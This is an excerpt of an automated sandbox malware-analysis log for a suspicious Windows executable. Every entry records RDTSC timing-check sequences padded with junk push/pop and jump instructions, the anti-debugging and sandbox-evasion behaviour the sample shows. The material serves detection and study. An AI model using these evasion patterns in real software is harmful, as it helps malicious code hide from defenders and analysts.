Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 310937 second address: 310945 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8764C3B8B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 310945 second address: 310949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 313278 second address: 3132A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007F8764C3B8B8h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F8764C3B8BFh 0x00000018 pop ecx 0x00000019 jmp 00007F8764C3B8BAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3132A7 second address: 3132AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3132AC second address: 3132B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 31B3A4 second address: 31B3A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 31B3A8 second address: 31B3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320811 second address: 320815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320815 second address: 320845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F8764C3B8D3h 0x0000000c popad 0x0000000d push esi 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320845 second address: 32084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320C56 second address: 320C72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8764C3B8C2h 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320C72 second address: 320C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320E0B second address: 320E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320E0F second address: 320E2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320E2F second address: 320E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320FB3 second address: 320FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320FBB second address: 320FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320FC1 second address: 320FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320FC6 second address: 320FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320FCC second address: 320FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCBh 0x00000007 jmp 00007F8765238CCCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320FEB second address: 320FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 320FF1 second address: 320FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 324FCF second address: 324FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3250F5 second address: 3250FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32528F second address: 3252B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8764C3B8C5h 0x0000000d jns 00007F8764C3B8B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3252B2 second address: 3252DA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8765238CC6h 0x00000008 jmp 00007F8765238CCFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F8765238CCCh 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 325435 second address: 32543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32543B second address: 325443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3255E1 second address: 3255F8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8764C3B8BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3255F8 second address: 3255FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32B3D4 second address: 32B429 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8764C3B8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8764C3B8C6h 0x0000000f jc 00007F8764C3B8CFh 0x00000015 jmp 00007F8764C3B8C9h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8764C3B8C2h 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32B429 second address: 32B44C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8765238CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8765238CCCh 0x00000012 jno 00007F8765238CCAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32B55D second address: 32B582 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8764C3B8B6h 0x00000008 jmp 00007F8764C3B8BEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32B582 second address: 32B588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32B9A8 second address: 32B9C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32B9C0 second address: 32B9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8765238CD2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32BF9A second address: 32BFA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8764C3B8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32BFA4 second address: 32BFCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD5h 0x00000007 jno 00007F8765238CC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F8765238CCCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32D14E second address: 32D173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8764C3B8BEh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32D173 second address: 32D177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 32D177 second address: 32D17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3368C2 second address: 3368C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3368C6 second address: 3368CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 335C50 second address: 335C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 335C55 second address: 335C8F instructions: 0x00000000 rdtsc 0x00000002 js 00007F8764C3B8C9h 0x00000008 jmp 00007F8764C3B8C3h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8764C3B8C7h 0x00000014 jp 00007F8764C3B8B6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 335C8F second address: 335C95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 335DD0 second address: 335DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 335DD4 second address: 335DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F8765238CC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 335DE4 second address: 335DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 335DE8 second address: 335DF5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 335DF5 second address: 335E0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33DE98 second address: 33DEBD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007F8765238CC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F8765238CD5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33DEBD second address: 33DEC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33DEC1 second address: 33DEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33E614 second address: 33E618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33E75F second address: 33E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8765238CC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33E91D second address: 33E923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33EA6F second address: 33EA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33EA73 second address: 33EA81 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8764C3B8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33EA81 second address: 33EA87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33EA87 second address: 33EA97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007F8764C3B8B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33EA97 second address: 33EAA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33EAA7 second address: 33EAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33EAAB second address: 33EACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8765238CC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jp 00007F8765238CC6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8765238CCAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 33EACF second address: 33EB03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C9h 0x00000007 jmp 00007F8764C3B8C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3455DF second address: 3455E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 34BCE1 second address: 34BD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jmp 00007F8764C3B8C5h 0x0000000b pop esi 0x0000000c jmp 00007F8764C3B8C7h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F8764C3B8BEh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 34BD29 second address: 34BD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F8765238CC6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3533B0 second address: 3533B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 357066 second address: 35706D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 35706D second address: 357073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 357073 second address: 357079 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 356B78 second address: 356BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F8764C3B8B6h 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jnc 00007F8764C3B8B6h 0x00000019 jmp 00007F8764C3B8C6h 0x0000001e pop eax 0x0000001f jnl 00007F8764C3B8BEh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 35D324 second address: 35D328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 35D328 second address: 35D357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8764C3B8BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8764C3B8C7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 35D357 second address: 35D37F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8765238CCBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3675D5 second address: 3675D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3675D9 second address: 3675EF instructions: 0x00000000 rdtsc 0x00000002 js 00007F8765238CC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F8765238CC6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36A80B second address: 36A80F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36A80F second address: 36A81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F8765238CC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36EEED second address: 36EEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36F1B3 second address: 36F1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36F1B9 second address: 36F1BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36F1BD second address: 36F1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36F308 second address: 36F312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8764C3B8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36F312 second address: 36F318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36F705 second address: 36F715 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 36F715 second address: 36F72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8765238CCCh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 37273F second address: 372762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8764C3B8C9h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 372762 second address: 37277B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 37277B second address: 372787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8764C3B8B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 37538B second address: 37538F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 37538F second address: 375393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 375393 second address: 3753A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F8765238CD4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
